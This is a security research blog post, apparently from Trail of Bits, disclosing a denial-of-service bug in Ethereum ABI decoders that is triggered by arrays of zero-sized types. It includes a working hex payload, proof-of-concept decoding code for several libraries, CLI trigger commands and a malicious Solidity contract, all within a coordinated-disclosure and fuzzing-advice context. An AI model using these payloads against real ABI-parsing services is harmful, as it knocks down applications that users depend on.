Billion times emptiness

By Max Ammann

Behind Ethereum’s powerful blockchain technology lies a lesser-known challenge that blockchain developers face: the intricacies of writing robust Ethereum ABI (Application Binary Interface) parsers. Ethereum’s ABI is critical to the blockchain’s infrastructure, enabling seamless interactions between smart contracts and external applications. The complexity of data types and the need for precise encoding and decoding make ABI parsing challenging. Ambiguities in the specification or implementation may lead to bugs that put users at risk.

In this blog post, we’ll delve into a newly found bug that affects these parsers, reminiscent of the notorious “Billion Laughs” attack that plagued XML in the past. We found that parts of the Ethereum ABI specification are written loosely, leading to implementations that can be exploited to cause denial-of-service (DoS) conditions in eth_abi (Python), ethabi (Rust), alloy-rs, and ethereumjs-abi, posing a risk to the availability of blockchain platforms. At the time of writing, the bug is fixed only in the Python library. For all other libraries, the bug was disclosed publicly through GitHub issues.

What is the Ethereum ABI?

Whenever contracts on the chain interact, or off-chain components talk to contracts, Ethereum uses ABI encoding for requests and responses. The encoding is not self-describing: encoders and decoders must supply a schema that defines the represented data types. Unlike the platform-dependent ABI of the C programming language, the Ethereum ABI specifies a single binary representation for passing data between applications. Even though the specification is not formal, it gives a good understanding of how data is exchanged.
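To make the point about schemas concrete, the following Python sketch decodes the same 128 bytes under two different schemas. It is a hand-written illustration, not eth_abi's API: the helpers word, read_word, as_two_uint256, and as_uint256_array are hypothetical, and they skip the bounds checks a real decoder needs.

```python
WORD = 32

def word(value: int) -> bytes:
    """Encode an unsigned integer as one big-endian 32-byte ABI word."""
    return value.to_bytes(WORD, "big")

def read_word(data: bytes, pos: int) -> int:
    """Read one 32-byte word (no bounds checks; illustration only)."""
    return int.from_bytes(data[pos:pos + WORD], "big")

def as_two_uint256(data: bytes) -> tuple[int, int]:
    """Schema (uint256,uint256): two static words, read in place."""
    return read_word(data, 0), read_word(data, WORD)

def as_uint256_array(data: bytes) -> list[int]:
    """Schema (uint256[]): a head offset, then a length word, then the elements."""
    offset = read_word(data, 0)
    length = read_word(data, offset)
    start = offset + WORD
    return [read_word(data, start + i * WORD) for i in range(length)]

data = word(0x20) + word(2) + word(7) + word(9)
print(as_two_uint256(data))    # (32, 2)
print(as_uint256_array(data))  # [7, 9]
```

Nothing in the bytes says which reading is correct; only the schema supplied by the caller decides.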

Currently, the specification lives in the Solidity documentation. The ABI definition influences the types used in languages for smart contracts, like Solidity and Vyper.

Understanding the bug

Zero-sized types (ZSTs) are data types that take zero (or minimal) bytes to store on disk but substantially more to represent once loaded in memory. The Ethereum ABI allows ZSTs, and they can enable a denial-of-service (DoS) attack by forcing the application to allocate an immense amount of memory to handle a tiny on-disk or over-the-network representation.

Consider the following example: What happens when a parser encounters an array of ZSTs? It should try to parse as many ZSTs as the array claims to contain. Because each array element takes zero bytes, defining an enormously large array of ZSTs is trivial.

As a concrete example, the following figure shows a payload of 20 on-disk bytes, which will deserialize to an array of the numbers 2, 1, and 3. A second payload of 8 on-disk bytes will deserialize to 2^32 elements of a ZST (like an empty tuple or empty array).

This would not be a problem if each ZST took up zero bytes of memory after parsing. In practice, this is rarely the case. Typically, each element requires a small but non-zero amount of memory, so representing the entire array requires an enormous allocation. This is the denial-of-service vector.
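The amplification can be sketched with a toy count-prefixed format. The layout is an assumption chosen to match the sizes in the figure (an 8-byte little-endian count followed by 4-byte integers); it is not the Ethereum ABI, and decode_u32_array and decode_zst_array are hypothetical helpers.

```python
import struct
import sys

# Assumed toy layout: u64 little-endian count, then the elements.

def decode_u32_array(buf: bytes) -> list[int]:
    """Decode a count-prefixed array of 4-byte little-endian integers."""
    (count,) = struct.unpack_from("<Q", buf, 0)
    return list(struct.unpack_from(f"<{count}I", buf, 8))

def decode_zst_array(buf: bytes) -> list[tuple]:
    """Decode a count-prefixed array of empty tuples (a ZST).

    Each element consumes zero input bytes, so nothing ties `count`
    to the size of `buf`: 8 bytes can claim 2**32 elements.
    """
    (count,) = struct.unpack_from("<Q", buf, 0)
    return [() for _ in range(count)]

numbers = struct.pack("<Q3I", 3, 2, 1, 3)
print(len(numbers), decode_u32_array(numbers))  # 20 [2, 1, 3]

# A modest count keeps this demo safe; 2**32 would exhaust memory.
zsts = struct.pack("<Q", 1_000_000)
decoded = decode_zst_array(zsts)
print(len(zsts), len(decoded), sys.getsizeof(decoded))
```

Even though CPython shares a single empty-tuple object, each list slot still holds an 8-byte reference on a 64-bit build, so 2^32 elements would need roughly 32 GiB for the list alone.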

Robust parser design is crucial to prevent severe issues like crashes, misinterpretations, hangs, or excessive resource usage. The root cause of such issues can lie in either the specifications or the implementations.

In the case of the Ethereum ABI, I argue that the specification itself is flawed. It had the opportunity to explicitly prohibit ZSTs, yet it failed to do so. This oversight contrasts with the latest Solidity and Vyper versions, where defining ZSTs, such as empty tuples or empty arrays, is impossible.
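As a sketch of what such a prohibition could look like, the following Python function rejects any type string that contains a ZST. It handles only a simplified subset of the ABI type grammar (elementary names, tuples written as (T1,T2), and [N] or [] array suffixes) and is our own illustration; neither the specification nor any library defines contains_zst or its helpers.

```python
def split_components(body: str) -> list[str]:
    """Split a tuple body on top-level commas, ignoring nested tuples."""
    parts, depth, start = [], 0, 0
    for i, ch in enumerate(body):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            parts.append(body[start:i])
            start = i + 1
    if body:
        parts.append(body[start:])
    return parts

def is_zero_sized(t: str) -> bool:
    """True if every value of type t encodes to zero bytes."""
    if t.endswith("]"):
        base, dim = t[: t.rindex("[")], t[t.rindex("[") + 1 : -1]
        if dim == "":
            return False  # a dynamic array always encodes its length word
        return int(dim) == 0 or is_zero_sized(base)
    if t.startswith("("):
        return all(is_zero_sized(c) for c in split_components(t[1:-1]))
    return False  # elementary types such as uint32 or bool are never empty

def contains_zst(t: str) -> bool:
    """True if t is, or anywhere contains, a zero-sized type."""
    if is_zero_sized(t):
        return True
    if t.endswith("]"):
        return contains_zst(t[: t.rindex("[")])
    if t.startswith("("):
        return any(contains_zst(c) for c in split_components(t[1:-1]))
    return False

for schema in ["()[]", "uint32[0][]", "uint256[]", "(uint256,bool)[2]"]:
    print(schema, "rejected" if contains_zst(schema) else "ok")
# ()[] rejected
# uint32[0][] rejected
# uint256[] ok
# (uint256,bool)[2] ok
```

Rejecting the schema before any bytes are decoded mirrors what Solidity and Vyper already enforce at the language level.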

To ensure maximum safety, file format specifications must be crafted carefully, and their implementations must be rigorously fortified to avoid unforeseen behaviors.

Proof of concept

Let’s dive into some examples that showcase the bug in several libraries. We define the data payload as:

0000000000000000000000000000000000000000000000000000000000000020
00000000000000000000000000000000000000000000000000000000FFFFFFFF

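The payload consists of two 32-byte blocks describing a serialized array of ZSTs. The first block is an offset (0x20, i.e., 32 bytes) pointing to where the array's encoding begins. The second block, located at that offset, holds the array's length, 0xFFFFFFFF (2^32 - 1). No element data follows, because every element is zero-sized. In the examples below, regardless of the programming language, we refer to this hex string as payload.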
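The following Python sketch rebuilds the payload from its two words and reads them back the way an ABI decoder would. The helper name word is hypothetical; the arithmetic shows that the array claims 4,294,967,295 elements while zero bytes of element data remain after the length word.

```python
WORD = 32

def word(value: int) -> bytes:
    """Encode an unsigned integer as one big-endian 32-byte ABI word."""
    return value.to_bytes(WORD, "big")

payload = (word(0x20) + word(0xFFFFFFFF)).hex()

data = bytes.fromhex(payload)
offset = int.from_bytes(data[0:WORD], "big")                  # first word: 0x20
length = int.from_bytes(data[offset:offset + WORD], "big")    # word at that offset
elements_start = offset + WORD                                 # element data would begin here
print(len(data), offset, length, len(data) - elements_start)  # 64 32 4294967295 0
```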

We will try to decode this payload with the ABI schemata ()[] and uint32[0][] using several Ethereum ABI parsing libraries. The former is a dynamic array of empty tuples, and the latter is a dynamic array of empty static arrays. The distinction between dynamic and static is important: an empty static array takes zero bytes, whereas an empty dynamic array still takes at least one 32-byte word because its length is serialized.
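The size difference can be checked by hand-encoding a few values. This Python sketch is not a general ABI encoder: it assumes a single top-level dynamic array parameter, and word and encode_array are hypothetical helpers. It shows that an array of zero-sized elements encodes to the same 64 bytes no matter how many elements it claims, whereas an array of uint32 values grows by one 32-byte word per element.

```python
def word(value: int) -> bytes:
    """Encode an unsigned integer as one big-endian 32-byte ABI word."""
    return value.to_bytes(32, "big")

def encode_array(element: bytes, count: int) -> bytes:
    """Top-level T[] of `count` copies of a static element:
    head offset (0x20), length word, then the element encodings."""
    return word(0x20) + word(count) + element * count

EMPTY_STATIC = b""       # encoding of () or uint32[0]: no bytes at all
UINT32_SEVEN = word(7)   # a uint32 is padded to a full 32-byte word

for count in (0, 3, 1_000):
    print(count, len(encode_array(EMPTY_STATIC, count)), len(encode_array(UINT32_SEVEN, count)))
# 0 64 64
# 3 64 160
# 1000 64 32064
```

With EMPTY_STATIC and a count of 0xFFFFFFFF, encode_array produces exactly the 64-byte payload used in the examples below.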

eth_abi (Python)

The following Python program uses the official eth_abi library (versions before 4.2.0). The program first hangs and then terminates with an out-of-memory error.

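from eth_abi import decode

# payload: the hex string shown above (offset 0x20, then length 0xFFFFFFFF)
payload = "00" * 31 + "20" + "00" * 28 + "ffffffff"
data = bytes.fromhex(payload)
decode(['()[]'], data)  # hangs, then runs out of memory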

The eth_abi library only supported the empty-tuple representation; it did not support empty static arrays such as uint32[0].

ethabi (Rust)

The ethabi library (v18.0.0) allows triggering the bug directly from its CLI.

cargo run -- decode params -t "uint32[0][]" $payload

ethers-rs (Rust)

The following Rust program uses the ethers-rs library and expresses the schema uint32[0][] implicitly through the corresponding Rust type, Vec<[u32; 0]>.

use ethers::abi::AbiDecode;

// payload: the hex string shown above
let data = hex::decode(payload).unwrap();
// Vec<[u32; 0]> corresponds to the ABI type uint32[0][]
let _ = Vec::<[u32; 0]>::decode(&data).unwrap();

It is vulnerable to the DoS issue because the ethers-rs library (v2.0.10) uses ethabi.

foundry (Rust)

The foundry toolkit uses ethers-rs, which suggests that the DoS vector should also be present there. It turns out it is!

One way to trigger the bug is by directly decoding the payload via the CLI, just like in ethabi.

cast --abi-decode "abc()(uint256[0][])" $payload

Another, more interesting proof of concept is to deploy the following malicious smart contract. It uses assembly to return data that matches the payload.

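pragma solidity ^0.8.0;

contract ABC {
    fallback() external {
        // Encode the payload's two words: offset 0x20 and length 0xffffffff
        bytes memory data = abi.encode(0x20, 0xffffffff);
        assembly {
            // Return the raw encoding, skipping the 32-byte length prefix of `data`
            return(add(data, 0x20), mload(data))
        }
    }
}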

If the caller declares the return type (here, uint256[0][]), decoding the contract’s response leads to a hang and huge memory consumption in the CLI tool. The following command calls the contract on a local testnet.

cast call --private-key \
0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80 \
-r http://127.0.0.1:8545 0x5fbdb2315678afecb367f032d93f642f64180aa3 \
"abc() returns (uint256[0][])"

alloy-rs

The ABI parser in alloy-rs (0.4.2) hangs in the same way as the other libraries when decoding the payload.

use alloy_dyn_abi::{DynSolType, DynSolValue};

// payload: the hex string shown above
let my_type: DynSolType = "()[]".parse().unwrap();
let data = hex::decode(payload).unwrap();
let decoded: DynSolValue = my_type.abi_decode(&data).unwrap();

ethereumjs-abi

Finally, the ethereumjs-abi library (0.6.8) is also vulnerable.

const abi = require('ethereumjs-abi')
// payload: the hex string shown above
const data = Buffer.from(payload, 'hex')
abi.rawDecode(['uint32[]'], data)
// or this call: abi.rawDecode(['uint32[0][]'], data)

Other libraries

The go-ethereum and ethers.js libraries do not have this bug because they implicitly disallow ZSTs: they expect each element of an array to be at least 32 bytes long. The web3.js library is also not affected because it uses ethers.js.
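The same idea can be expressed as an explicit check that bounds each claimed array length by the bytes remaining in the input. The Python sketch below is our own illustration of that check, not code from go-ethereum or ethers.js; word, read_word, checked_array_length, and DecodeError are hypothetical names. Charging each element at least one 32-byte word rejects the payload before any allocation happens.

```python
WORD = 32

class DecodeError(ValueError):
    """Raised for malformed or resource-exhausting input."""

def word(value: int) -> bytes:
    return value.to_bytes(WORD, "big")

def read_word(data: bytes, pos: int) -> int:
    """Read one 32-byte word, refusing to read past the end of the input."""
    if pos < 0 or pos + WORD > len(data):
        raise DecodeError(f"no 32-byte word at offset {pos}")
    return int.from_bytes(data[pos:pos + WORD], "big")

def checked_array_length(data: bytes, offset: int, element_size: int) -> int:
    """Read a dynamic array's length word at `offset` and reject lengths
    the remaining input cannot back.

    `element_size` is the element's encoded size in bytes (use 32 for
    dynamic elements, whose head is an offset word). Rounding it up to
    one word charges a ZST element 32 bytes, matching the
    at-least-32-bytes assumption described above.
    """
    length = read_word(data, offset)
    remaining = len(data) - (offset + WORD)
    if length * max(element_size, WORD) > remaining:
        raise DecodeError(f"array claims {length} elements, only {remaining} bytes remain")
    return length

payload = word(0x20) + word(0xFFFFFFFF)
try:
    checked_array_length(payload, read_word(payload, 0), element_size=0)
except DecodeError as err:
    print("rejected:", err)

three_uint32 = word(0x20) + word(3) + word(2) + word(1) + word(3)
print(checked_array_length(three_uint32, 0x20, element_size=WORD))  # 3
```

The check costs one multiplication per array and turns the hang into an immediate, reportable error.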

How the bug was discovered

The idea to test for this type of bug came after I stumbled upon an issue in the borsh-rs library. To mitigate the DoS vector, the Rust library tried to parse arrays of ZSTs in constant time, which caused undefined behavior. The library’s authors ultimately decided to disallow ZSTs completely. During another audit, a custom ABI parser also had a DoS vector when parsing ZSTs. Suspecting that these two issues were not a coincidence, we investigated other ABI parsing libraries for this bug class.

How to exploit it

Whether this bug is exploitable depends on how the affected library is used. In the examples above, the demonstration targets were CLI tools.

I did not find a way to craft a smart contract that triggers this bug and deploy it to mainnet. This is mainly because the latest versions of Solidity and Vyper disallow ZSTs.

However, any application that uses one of the above libraries is potentially vulnerable. One example is Etherscan, which parses untrusted ABI declarations. Also, any off-chain software that fetches and decodes data from contracts could be vulnerable to this bug if it allows users to specify ABI types.

Fuzz your decoders!

Bugs in decoders are usually easy to catch by fuzzing the decoding routine, because its inputs are commonly byte arrays that can be fed directly to a fuzzer. Of course, there are exceptions, like the recent libwebp 0-day (CVE-2023-5129), which went undiscovered despite endless hours of fuzzing in OSS-Fuzz.
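The idea can be sketched in a few lines even without a fuzzing engine. The Python harness below is a deliberately tiny stand-in for a real fuzzer: it mutates a valid encoding at random and checks a resource property, namely that a successful decode never reports more array elements than the input has 32-byte words. The decoders decode_length_naive and decode_length_checked are hypothetical toys, not code from any library discussed here.

```python
import random

WORD = 32

def word(value: int) -> bytes:
    return value.to_bytes(WORD, "big")

def decode_length_naive(data: bytes) -> int:
    """Toy decoder: returns a top-level dynamic array's claimed length as-is."""
    if len(data) < 2 * WORD:
        raise ValueError("truncated input")
    offset = int.from_bytes(data[:WORD], "big")
    if offset + WORD > len(data):
        raise ValueError("offset out of bounds")
    return int.from_bytes(data[offset:offset + WORD], "big")

def decode_length_checked(data: bytes) -> int:
    """Same toy decoder, but each element is charged at least one word."""
    length = decode_length_naive(data)
    offset = int.from_bytes(data[:WORD], "big")
    if length * WORD > len(data) - offset - WORD:
        raise ValueError("length exceeds input")
    return length

def fuzz(decode, iterations: int = 10_000, seed: int = 0):
    """Return the first input that violates the resource property, or None."""
    rng = random.Random(seed)
    seed_input = word(0x20) + word(3) + word(2) + word(1) + word(3)
    for _ in range(iterations):
        data = bytearray(seed_input)
        for _ in range(rng.randint(1, 4)):  # overwrite a few random bytes
            data[rng.randrange(len(data))] = rng.randrange(256)
        try:
            count = decode(bytes(data))
        except ValueError:
            continue  # rejecting malformed input is the correct outcome
        if count * WORD > len(data):
            return bytes(data)  # decoder accepted an impossible length
    return None

print("checked:", fuzz(decode_length_checked))  # checked: None
crash = fuzz(decode_length_naive)
print("naive: violation found:", crash is not None)
```

A production setup would run the same kind of property check inside a coverage-guided engine, such as Atheris for Python or cargo-fuzz for Rust.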

In our audits at Trail of Bits, we employ fuzzing to identify bugs and educate clients on how to conduct their own fuzzing. We aim to contribute our fuzzers to Google’s OSS-Fuzz for continual testing, thus supplementing manual reviews by prioritizing crucial audit components. We’re updating our Testing Handbook, an exhaustive resource for developers and security professionals, to include specific guidance on optimizing fuzzer configuration and automating analysis tools throughout the software development lifecycle.

Coordinated disclosure

As part of the disclosure process, we reported the vulnerabilities to the library authors.

  • eth_abi (Python): The Ethereum-owned library fixed the bug as part of a private GitHub advisory. The fix was released in version 4.2.0.
  • ethabi (Rust) and alloy-rs: The maintainers of the crates asked that we open GitHub issues after the end of the embargo period. We created the corresponding issues in both repositories.
  • ethereumjs-abi: We got no response from the project and thus created a GitHub issue.
  • ethers-rs and foundry: We informed the projects about their usage of ethabi (Rust). We expect them to update to patched versions of ethabi as soon as they are available or to switch to another ABI decoding implementation. The broader community will be notified through RustSec advisories for ethabi and alloy-rs and a GitHub advisory for eth_abi (Python).

The timeline of disclosure is provided below:

  • June 30, 2023: Initial outreach to the maintainers of ethabi (Rust), eth_abi (Python), alloy-rs, and ethereumjs-abi.
  • June 30, 2023: Notification by the alloy-rs maintainers that a GitHub issue should be created.
  • June 30, 2023: First response by the eth_abi (Python) project and internal triaging started.
  • July 26, 2023: Clarified ethabi’s maintenance status through a GitHub issue, which led to a notice in the README file. As a result, we decided to post a public GitHub issue after the embargo.
  • August 2, 2023: Created private security advisory on GitHub for eth_abi (Python).
  • August 31, 2023: Fix is published by eth_abi (Python) without public references to the DoS vector. We later verified this fix.
  • December 29, 2023: Publication of this blog post and GitHub issues in the ethabi, alloy-rs, and ethereumjs-abi repositories.

Article Link: Billion times emptiness | Trail of Bits Blog